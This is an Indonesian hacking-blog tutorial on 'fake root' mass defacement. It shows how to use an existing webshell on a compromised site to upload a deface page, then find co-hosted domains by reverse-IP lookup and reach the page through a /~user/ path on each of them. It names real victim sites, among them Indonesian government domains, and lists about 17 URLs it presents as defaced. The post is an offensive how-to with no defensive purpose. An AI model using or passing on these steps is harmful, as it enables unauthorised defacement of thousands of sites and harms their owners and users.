Kamu Ingin Request Artikel? Klik Oke :)
Beranda
Deface
WebShell

Deface POC Fake Root (Retas Ribuan Situs)

Retas Ribuan Situs Tanpa Ribet Mass Deface _<

Baca Juga

Deface Fake Root To Reverse IP

Assalamu'alaikum Brother

Kali ini saya membagikan tutorial deface POC Fake Root To Reverse IP, yaitu deface yang bisa meretas ribuan situs sekaligus dalam 1 webshell yang kamu punya tanpa susah-susah mass deface..

Oke Langsung Saja..

Berikut Bahan-bahan Yang Diperlukan:

1. Reverse IP

2. Shell yang sudah tertanam di web korban.

3. Script deface

Exploit :

http://www.example.com/~root

Cek web yang sudah tertanam shell dengan exploit diatas.

Contoh :

http://cwe.ac.id/~root maka hasilnya forbidden.

Langkah selanjutnya, upload script deface di user setelah /home/ (cwe itu user web nya) dan /public_html/ .

ex : http://cwe.ac.id/zZ.htm

Web Shell Target

Oke, sekarang saatnya melihat domain ayng berada Satu Server dengan http://cwe.ac.id/ atau lewat Server IP Nya disini web server nya 103.134.152.1.

Sobat bisa menggunakan web Reverse IP diatas atau jika shell sobat sudah dilengkapi dengan tools Local Domain Viewer(tools 1n73ction sudah ada), tinggan klik menu DOMAIN.

Wow, ada 4625 domain.

Hasil Reverse IP

Nah, Cara Melihat Hasil Fake Root nya exploit begini :

http://www.example.com /~nama user web/ scriptmu.html

Lihat dir dibelakang public_html

Contoh , /home/cwe/public_html/ .

Karena saya tadi mengupload script zZ.htm di user dan public_html,

coba cek salahsatu domain yang satu server dengan exploit diatas.

Contoh domain yang satu server dengan http://cwe.ac.id/ adalah http://bpsdmd.nttprov.go.id/

Cek, http://bpsdmd.nttprov.go.id/~cwe/zZ.htm

Hasil Deface Fake Root To Reverse IP

Hal itu akan terjadi di 4625 domain lainnya tanpa ada susah susah melakukan mass deface server. Cukup tambahkan ~cwe/zZ.htm

See More :

bonjurfarm.co.id/~cwe/zZ.htm

bos.ipctpk.co.id/~cwe/zZ.htm

bpbd.kapuashulukab.go.id/~cwe/zZ.htm

bpbd.shirobyte.com/~cwe/zZ.htm

bpbj-setda.kapuashulukab.go.id/~cwe/zZ.htm

bph.itspku.id/~cwe/zZ.htm

bpkad.bengkaliskab.go.id/~cwe/zZ.htm

bpom-pwa.okta.web.id/~cwe/zZ.htm

bpsdmd.nttprov.go.id/~cwe/zZ.htm

brits.co.id/~cwe/zZ.htm

bronzebuku.undangyuk.com/~cwe/zZ.htm

bronze.undangyuk.com/~cwe/zZ.htm

bsm-example.onepay.biz.id/~cwe/zZ.htm

btc.ajikusuma.com/~cwe/zZ.htm

buanasetya.undangyuk.com/~cwe/zZ.htm

budapuspa.undangyuk.com/~cwe/zZ.htm

budhisintya.undangyuk.com/~cwe/zZ.htm

Oke Cukup Sekian Tutorial dari saya, semoga bermanfaat dan jangan lupa share.. Terimakasih

Posting Komentar